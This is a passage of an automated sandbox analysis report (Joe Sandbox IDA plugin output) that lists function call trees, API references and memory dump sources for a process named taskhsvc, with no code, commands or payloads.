      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 00223D3D
      • Part of subcall function 003286E9: strlen.MSVCRT ref: 00328739
      • Part of subcall function 003286E9: __stack_chk_fail.LIBSSP-0 ref: 00328789
      • Part of subcall function 00317D3D: free.MSVCRT ref: 00317D98
      • Part of subcall function 00317D3D: __stack_chk_fail.LIBSSP-0 ref: 00317DAB
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • free.MSVCRT ref: 00223D25
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 002878D8
      • Part of subcall function 002875C0: time.MSVCRT ref: 002875F0
      • Part of subcall function 002875C0: abort.MSVCRT ref: 00287690
      • Part of subcall function 002875C0: abort.MSVCRT ref: 002876E2
      • Part of subcall function 002875C0: event_add.LIBEVENT-2-0-5 ref: 00287713
      • Part of subcall function 002875C0: __stack_chk_fail.LIBSSP-0 ref: 00287724
    • __stack_chk_fail.LIBSSP-0 ref: 00287904
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855138358.00267000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • rename.MSVCRT ref: 00315B14
    • __stack_chk_fail.LIBSSP-0 ref: 00315B24
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • WSAStartup.WS2_32 ref: 0031922D
    • __stack_chk_fail.LIBSSP-0 ref: 00319286
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • strerror.MSVCRT ref: 002C005A
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 002BEE07: __stack_chk_fail.LIBSSP-0 ref: 002BEE6E
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C166E
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C1698
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C16DA
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C1731
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C178E
      • Part of subcall function 002C13B7: __stack_chk_fail.LIBSSP-0 ref: 002C17A8
      • Part of subcall function 002BEE75: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,002C01E2), ref: 002BEF25
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
    • strerror.MSVCRT ref: 002C026C
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00319BE8: memset.MSVCRT ref: 00319C1F
      • Part of subcall function 00319BE8: __stack_chk_fail.LIBSSP-0 ref: 00319C3A
      • Part of subcall function 002B3EC7: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002B66C7), ref: 002B3EFF
      • Part of subcall function 002339FC: __stack_chk_fail.LIBSSP-0 ref: 00233AAE
    • __stack_chk_fail.LIBSSP-0 ref: 002C0321
      • Part of subcall function 00237466: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,002C0313), ref: 00237491
      • Part of subcall function 00326573: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,002C0EBF), ref: 003265A7
      • Part of subcall function 002BF7B1: strlen.MSVCRT ref: 002BF845
      • Part of subcall function 002BF7B1: strerror.MSVCRT ref: 002BF878
      • Part of subcall function 002BF7B1: strlen.MSVCRT ref: 002BF8B5
      • Part of subcall function 002BF7B1: strerror.MSVCRT ref: 002BF93C
      • Part of subcall function 002BF7B1: __stack_chk_fail.LIBSSP-0 ref: 002BF99F
      • Part of subcall function 003265AE: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,003266E8), ref: 003265E2
      • Part of subcall function 00325CFA: abort.MSVCRT ref: 00325D72
      • Part of subcall function 00325CFA: abort.MSVCRT ref: 00325DB1
      • Part of subcall function 00325CFA: abort.MSVCRT ref: 00325DF6
      • Part of subcall function 00325CFA: strerror.MSVCRT ref: 00325ECF
      • Part of subcall function 00325CFA: strerror.MSVCRT ref: 00325F30
      • Part of subcall function 00325CFA: _close.MSVCRT ref: 00325F8C
      • Part of subcall function 00325CFA: free.MSVCRT ref: 00325FB5
      • Part of subcall function 00325CFA: free.MSVCRT ref: 00325FDD
      • Part of subcall function 00325CFA: free.MSVCRT ref: 00325FFF
      • Part of subcall function 00325CFA: __stack_chk_fail.LIBSSP-0 ref: 0032601B
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 00315895: strlen.MSVCRT ref: 003158CA
      • Part of subcall function 00315895: __stack_chk_fail.LIBSSP-0 ref: 00315904
    • CreateFileA.KERNEL32 ref: 00315BEF
      • Part of subcall function 0031928D: FormatMessageA.KERNELBASE ref: 003192E4
      • Part of subcall function 0031928D: __stack_chk_fail.LIBSSP-0 ref: 0031933D
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • free.MSVCRT ref: 00315E9E
      • Part of subcall function 00315F38: free.MSVCRT ref: 00315FE2
      • Part of subcall function 00315F38: __stack_chk_fail.LIBSSP-0 ref: 00315FFE
    • __stack_chk_fail.LIBSSP-0 ref: 00315F2B
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00321355: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213C1
      • Part of subcall function 00321355: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213E7
    • memset.MSVCRT ref: 002BF3B3
      • Part of subcall function 0032174B: free.MSVCRT ref: 00321775
      • Part of subcall function 0032174B: __stack_chk_fail.LIBSSP-0 ref: 0032178D
    • memset.MSVCRT ref: 002BF4BA
    • __stack_chk_fail.LIBSSP-0(?), ref: 002BF590
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00321355: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213C1
      • Part of subcall function 00321355: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213E7
    • memset.MSVCRT ref: 0031D60E
      • Part of subcall function 0032174B: free.MSVCRT ref: 00321775
      • Part of subcall function 0032174B: __stack_chk_fail.LIBSSP-0 ref: 0032178D
    • memset.MSVCRT ref: 0031D715
    • __stack_chk_fail.LIBSSP-0(?), ref: 0031D7EB
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00321355: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213C1
      • Part of subcall function 00321355: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213E7
    • memset.MSVCRT ref: 0031DFEF
      • Part of subcall function 0032174B: free.MSVCRT ref: 00321775
      • Part of subcall function 0032174B: __stack_chk_fail.LIBSSP-0 ref: 0032178D
    • memset.MSVCRT ref: 0031E0F6
    • __stack_chk_fail.LIBSSP-0(?), ref: 0031E1CC
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0032E7FD: __stack_chk_fail.LIBSSP-0 ref: 0032E852
      • Part of subcall function 0032D3C2: abort.MSVCRT ref: 0032D412
      • Part of subcall function 0032D3C2: __stack_chk_fail.LIBSSP-0 ref: 0032D507
    • free.MSVCRT ref: 0032EF2B
      • Part of subcall function 0032E859: __stack_chk_fail.LIBSSP-0 ref: 0032E8DD
      • Part of subcall function 0031AA40: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,002526E7), ref: 0031AA97
      • Part of subcall function 0031AA40: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,002526E7), ref: 0031AAD5
      • Part of subcall function 0031AA40: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,002526E7), ref: 0031AB19
      • Part of subcall function 0031AA40: memmove.MSVCRT ref: 0031AB70
      • Part of subcall function 0031AA40: __stack_chk_fail.LIBSSP-0 ref: 0031AB97
    • free.MSVCRT ref: 0032EF9C
    • __stack_chk_fail.LIBSSP-0 ref: 0032F10C
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 0032E8E4: memset.MSVCRT ref: 0032E941
      • Part of subcall function 0032E8E4: memset.MSVCRT ref: 0032E95F
      • Part of subcall function 0032E8E4: memset.MSVCRT ref: 0032EC7C
      • Part of subcall function 0032E8E4: __stack_chk_fail.LIBSSP-0 ref: 0032EC92
      • Part of subcall function 0032158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 003215E4
      • Part of subcall function 0032158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 00321623
      • Part of subcall function 0032158B: memcpy.MSVCRT ref: 0032164A
      • Part of subcall function 0032158B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 0032165D
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 0032BEDA: abort.MSVCRT ref: 0032BF43
      • Part of subcall function 0032BEDA: abort.MSVCRT ref: 0032BFE0
      • Part of subcall function 0032BEDA: __stack_chk_fail.LIBSSP-0 ref: 0032C220
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 0024374A
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 0031F679: abort.MSVCRT ref: 0031F6C9
      • Part of subcall function 0031F679: __stack_chk_fail.LIBSSP-0 ref: 0031F6E4
      • Part of subcall function 0031FA10: __stack_chk_fail.LIBSSP-0 ref: 0031FA3B
      • Part of subcall function 0031F8C2: abort.MSVCRT ref: 0031F91E
      • Part of subcall function 0031F8C2: abort.MSVCRT ref: 0031F960
      • Part of subcall function 0031F8C2: abort.MSVCRT ref: 0031F99F
      • Part of subcall function 0031F8C2: abort.MSVCRT ref: 0031F9DE
      • Part of subcall function 0031F8C2: __stack_chk_fail.LIBSSP-0 ref: 0031FA09
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 0031F6EB: abort.MSVCRT ref: 0031F741
      • Part of subcall function 0031F6EB: abort.MSVCRT ref: 0031F780
      • Part of subcall function 0031F6EB: __stack_chk_fail.LIBSSP-0 ref: 0031F7A2
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 00231AED: abort.MSVCRT ref: 00231B56
      • Part of subcall function 00231AED: abort.MSVCRT ref: 00231B99
      • Part of subcall function 00231AED: abort.MSVCRT ref: 00231BE6
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231BF4
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231C08
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231C26
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231C44
      • Part of subcall function 00231AED: __stack_chk_fail.LIBSSP-0 ref: 00231D14
      • Part of subcall function 00326769: __stack_chk_fail.LIBSSP-0 ref: 003267D4
    • free.MSVCRT ref: 002436C4
    • free.MSVCRT ref: 00243708
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
      • Part of subcall function 003257BB: strlen.MSVCRT ref: 003257D7
      • Part of subcall function 003257BB: __stack_chk_fail.LIBSSP-0 ref: 00325841
    • free.MSVCRT ref: 0032592C
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • _stati64.MSVCRT ref: 00325913
    • __stack_chk_fail.LIBSSP-0 ref: 003259BE
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 0032ED00
    • memset.MSVCRT ref: 0032ED1B
      • Part of subcall function 0032EE71: free.MSVCRT ref: 0032EF2B
      • Part of subcall function 0032EE71: free.MSVCRT ref: 0032EF9C
      • Part of subcall function 0032EE71: __stack_chk_fail.LIBSSP-0 ref: 0032F10C
      • Part of subcall function 0032D7F2: abort.MSVCRT ref: 0032D854
      • Part of subcall function 0032D7F2: abort.MSVCRT ref: 0032D893
      • Part of subcall function 0032D7F2: memcpy.MSVCRT ref: 0032D8AD
      • Part of subcall function 0032D7F2: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001F57C7), ref: 0032D8C0
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 0032BEDA: abort.MSVCRT ref: 0032BF43
      • Part of subcall function 0032BEDA: abort.MSVCRT ref: 0032BFE0
      • Part of subcall function 0032BEDA: __stack_chk_fail.LIBSSP-0 ref: 0032C220
      • Part of subcall function 0032EDE0: free.MSVCRT ref: 0032EE34
      • Part of subcall function 0032EDE0: __stack_chk_fail.LIBSSP-0 ref: 0032EE6A
    • __stack_chk_fail.LIBSSP-0 ref: 0032EDD9
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00312E2F), ref: 00325635
    • _write.MSVCRT ref: 00325691
    • __stack_chk_fail.LIBSSP-0 ref: 003256C2
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    • abort.MSVCRT ref: 001E9241
    • time.MSVCRT ref: 001E9250
      • Part of subcall function 001E955F: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,???,?,001E91A2), ref: 001E969B
      • Part of subcall function 001E60BF: __stack_chk_fail.LIBSSP-0 ref: 001E60E6
    • __stack_chk_fail.LIBSSP-0 ref: 001E92DE
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DEE90), ref: 003343B0
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 00334024
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 0033407F
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 003340C1
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 0033411F
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 003341E9
      • Part of subcall function 00333FC6: __stack_chk_fail.LIBSSP-0 ref: 0033422C
    • memcpy.MSVCRT ref: 00334405
    • __stack_chk_fail.LIBSSP-0 ref: 00334423
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • strchr.MSVCRT ref: 00325C82
      • Part of subcall function 00323938: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FF97), ref: 00323967
      • Part of subcall function 00323938: __stack_chk_fail.LIBSSP-0 ref: 003239A8
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • strlen.MSVCRT ref: 00325CC4
      • Part of subcall function 00326865: __stack_chk_fail.LIBSSP-0 ref: 003268C7
    • __stack_chk_fail.LIBSSP-0 ref: 00325CF3
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 0025B75C: __stack_chk_fail.LIBSSP-0 ref: 0025B790
      • Part of subcall function 0025B797: __stack_chk_fail.LIBSSP-0 ref: 0025B7F8
      • Part of subcall function 0025B7FF: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EEC58), ref: 0025B86C
      • Part of subcall function 001C21C4: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001F73A0), ref: 001C21F7
      • Part of subcall function 001F2D31: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001E9B3E), ref: 001F2DCE
      • Part of subcall function 00230EF1: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,0025B4EC,?,?,?,?,?,?,?,?,?,001C424C), ref: 00230F24
      • Part of subcall function 001EE76C: strcmp.MSVCRT ref: 001EE905
      • Part of subcall function 001EE76C: abort.MSVCRT ref: 001EEA71
      • Part of subcall function 001EE76C: free.MSVCRT ref: 001EEB46
      • Part of subcall function 001EE76C: free.MSVCRT ref: 001EEB67
      • Part of subcall function 001EE76C: __stack_chk_fail.LIBSSP-0 ref: 001EEBD6
      • Part of subcall function 001E8CDE: __stack_chk_fail.LIBSSP-0 ref: 001E8DE1
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • __stack_chk_fail.LIBSSP-0 ref: 001EEE36
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 001EA631: __stack_chk_fail.LIBSSP-0 ref: 001EA800
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 0025D0FB: __stack_chk_fail.LIBSSP-0 ref: 0025D187
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 001F3AFF: __stack_chk_fail.LIBSSP-0 ref: 001F3C1F
      • Part of subcall function 001C22CB: abort.MSVCRT ref: 001C231B
      • Part of subcall function 001C22CB: event_pending.LIBEVENT-2-0-5 ref: 001C2351
      • Part of subcall function 001C22CB: __stack_chk_fail.LIBSSP-0 ref: 001C2371
    • __stack_chk_fail.LIBSSP-0 ref: 001F0D39
      • Part of subcall function 001F3521: abort.MSVCRT ref: 001F3577
      • Part of subcall function 001F3521: __stack_chk_fail.LIBSSP-0 ref: 001F36AB
      • Part of subcall function 001F1659: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C32C4), ref: 001F1688
      • Part of subcall function 001F37CE: abort.MSVCRT ref: 001F381E
      • Part of subcall function 001F37CE: __stack_chk_fail.LIBSSP-0 ref: 001F398D
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 001E3DED: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1825), ref: 001E3E14
      • Part of subcall function 001C2C57: abort.MSVCRT ref: 001C2CA7
      • Part of subcall function 001C2C57: abort.MSVCRT ref: 001C2CEE
      • Part of subcall function 001C2C57: abort.MSVCRT ref: 001C2D70
      • Part of subcall function 001C2C57: __stack_chk_fail.LIBSSP-0 ref: 001C2D81
      • Part of subcall function 00325435: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001F0905), ref: 00325455
      • Part of subcall function 001EF888: __stack_chk_fail.LIBSSP-0 ref: 001EFBD5
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 003255C5: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00312E2F), ref: 00325635
      • Part of subcall function 003255C5: _write.MSVCRT ref: 00325691
      • Part of subcall function 003255C5: __stack_chk_fail.LIBSSP-0 ref: 003256C2
      • Part of subcall function 00312B7A: __stack_chk_fail.LIBSSP-0 ref: 00312C03
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
    • __stack_chk_fail.LIBSSP-0 ref: 00312E49
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 00335FCA: ENGINE_load_builtin_engines.LIBEAY32 ref: 0033604B
      • Part of subcall function 00335FCA: ENGINE_register_all_complete.LIBEAY32 ref: 00336050
      • Part of subcall function 00335FCA: ENGINE_by_id.LIBEAY32 ref: 003360DF
      • Part of subcall function 00335FCA: ENGINE_set_default.LIBEAY32 ref: 0033617D
      • Part of subcall function 00335FCA: ENGINE_get_default_RSA.LIBEAY32 ref: 00336182
      • Part of subcall function 00335FCA: ENGINE_get_default_DH.LIBEAY32 ref: 00336197
      • Part of subcall function 00335FCA: ENGINE_get_default_ECDH.LIBEAY32 ref: 003361AC
      • Part of subcall function 00335FCA: ENGINE_get_default_ECDSA.LIBEAY32 ref: 003361C1
      • Part of subcall function 00335FCA: ENGINE_get_default_RAND.LIBEAY32 ref: 003361D6
      • Part of subcall function 00335FCA: ENGINE_get_default_RAND.LIBEAY32 ref: 003361EB
      • Part of subcall function 00335FCA: ENGINE_get_digest_engine.LIBEAY32 ref: 00336207
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 00336223
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 0033623F
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 0033625B
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 00336277
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 00336293
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 003362AF
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 003362CB
      • Part of subcall function 00335FCA: __stack_chk_fail.LIBSSP-0 ref: 00336340
      • Part of subcall function 001DA978: __stack_chk_fail.LIBSSP-0 ref: 001DA9A0
      • Part of subcall function 003EC5D8: evutil_secure_rng_init.LIBEVENT-2-0-5 ref: 003EC5F5
      • Part of subcall function 003EC5D8: evutil_secure_rng_add_bytes.LIBEVENT-2-0-5 ref: 003EC62F
      • Part of subcall function 003EC5D8: evutil_secure_rng_get_bytes.LIBEVENT-2-0-5 ref: 003EC645
      • Part of subcall function 003EC5D8: __stack_chk_fail.LIBSSP-0 ref: 003EC65B
    • __stack_chk_fail.LIBSSP-0 ref: 001C77A4
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 002E38C7: __stack_chk_fail.LIBSSP-0 ref: 002E3900
    Strings
    Memory Dump Source
